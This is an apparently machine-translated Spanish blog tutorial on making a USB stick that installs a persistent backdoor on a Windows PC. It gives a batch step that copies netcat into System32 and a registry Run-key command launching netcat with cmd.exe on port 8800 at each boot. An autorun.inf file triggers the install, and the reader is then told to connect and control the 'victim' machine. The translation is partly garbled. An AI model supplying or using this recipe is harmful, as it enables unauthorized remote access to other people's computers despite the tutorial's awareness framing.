Última actualización: 10 de julio de 2023
En los artículos anteriores, hemos visto cómo crear un Memoria USB rootkit que recupera contraseñas de una computadora bajo Windows. hoy veremos cómo crear una llave USB que abre una puerta trasera en una máquina Windows.
Este rootkit se ejecuta automáticamente, crea un puerta trasera en una pc Windows et vous permét de tomar el control de forma remota.
como de costumbre elobjetivo este tutorial, es mostrar a los líderes empresariales cuánto el uso de llaves USB puede ser peligroso. Lo que vale para las empresas no lo es menos para los particulares.
Toma el control de una PC de forma remota
Para tomar el control de una PC remota con una llave USB, siga los pasos anteriores:
Descarga la herramienta Netcat
Primero, crearemos una nueva carpeta en nuestra unidad USB. Luego vamos a descargar netcat, una utilidad para abrir conexiones de red, ya sea UDP o TCP.
También puede utilizar la herramienta Cryptcat, el clon de Netcat, con la única condición de que este último cifre sus comunicaciones.
Después de descargar Netcat, lo descomprimimos en la carpeta creada recientemente.
Crear una secuencia de comandos .bat
Luego crearemos un archivo puerta trasera murciélago. Este pequeño archivo tiene dos objetivos:
- Copie los archivos de Netcat en la carpeta System32 de la computadora de destino.
- Agregue un valor de cadena en el registro de la PC víctima para que nuestra puerta trasera se inicie en cada arranque.
Para ello, crearemos un nuevo documento de texto con el editor de texto Bloc de notas u otro editor de texto y pegaremos el siguiente código:
REG AÑADIR « HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun” /v “puerta trasera” /t “REG_SZ” /d “%SYSTEMROOT%System32nc.exe -d -L -e cmd.exe -p 8800”
Crear un archivo de ejecución automática
Ahora tenemos que crear el archivo. autorun.inf.
En este paso, crearemos una nueva opción en la ventana que aparece al insertar un USB, que nos permitirá (una vez pulsado sobre él) instalar nuestro backdoor en el equipo de destino.
Para lograr esto, abra un nuevo documento de texto y luego inserte este código:
abierto = puerta trasera.bat
ACTION=”darle un nombre a esta acción”
Finalmente guardamos el archivo bajo la raíz de la clave con el nombre autorun.inf
Implementar la puerta trasera creada
Después de insertar la llave USB, puede conectarse desde cualquier máquina a la estación de trabajo de la víctima con el siguiente comando:
192.168.1.17 designa la dirección IP de la máquina remota que debe reemplazar. Y 8800 es el puerto a usar para conectarse.
¡Y ahí tienes! Con esta técnica podrás tomar el control de una PC de forma remota. Puedes hacer lo que quieras: abrir archivos, iniciar una búsqueda, ejecutar un programa...
Aquí hay una lista de los comandos para manejar la máquina a distancia: Leer pedidos Windows.
Para cerrar sesión, escriba "cerrar sesión".
Haz un buen uso de ella.
23 Preguntas / Respuestas